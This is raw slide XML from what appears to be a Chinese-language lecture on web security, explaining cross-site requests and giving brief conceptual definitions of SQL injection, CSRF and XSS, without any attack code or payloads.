          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="3878590"/>
            <a:ext cx="838200" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>Pa$sw0rd</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16696321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431627" y="418394"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>跨站请求及其问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66" name="Shape 66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1847475"/>
            <a:ext cx="4805081" cy="3244477"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Shape 67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495800" y="1676400"/>
            <a:ext cx="4569980" cy="3954300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>当来自网站的页面将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>请求发送回网站时，它被称为同一站点请求。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果请求发送到其它网站，则称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站点请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，因为页面来自哪里以及请求所发送到的位置是不同的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>例如：一个网页（不是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>）可以包含一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>链接，所以当用户点击链接时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>请求会发送到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="637358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2" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="1524000"/>
            <a:ext cx="114300" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10243" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>三种最普遍的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10244" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1524000"/>
            <a:ext cx="8001000" cy="3962400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>浏览器向服务器发送恶意的输入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>错误的输入检查导致恶意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>查询</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跨站请求伪造（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site request forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>跨站脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="4876800"/>
            <a:ext cx="3962400" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>将恶意脚本注入可信上下文</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="3505200"/>
            <a:ext cx="3962400" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>在受害者服务器上利用用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="2286000"/>
            <a:ext cx="3962400" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>来更改数据库命令的含义</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7338407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24400" y="457200"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-69850">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>跨站请求及其问题</a:t>
            </a:r>
            <a:endParaRPr sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Shape 73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1536633"/>
            <a:ext cx="8222700" cy="4555200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="135000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>当从来自</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0" err="1">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>的页面向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0" err="1">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>发送请求时，浏览器会附加属于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0" err="1">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>的所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="135000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>当一个请求从另一个站点（不同于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0" err="1">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>）发送到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0" err="1">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>时，浏览器也会附加这些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cookie(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>属于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0" err="1">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="135000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>由于浏览器的上述行为，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>服务器无法区分同一站点和跨站点请求</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="135000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>第三方网站可能伪造与同一站点请求完全相同的请求。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45007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9874" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>基本流程图</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79876" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="2874963"/>
            <a:ext cx="1436688" cy="1436687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79877" name="Picture 11" descr="CompaqAlphaServerES40"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5951538" y="1855788"/>
            <a:ext cx="1155700" cy="1420812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79878" name="Picture 4" descr="DS15serverfront"/>
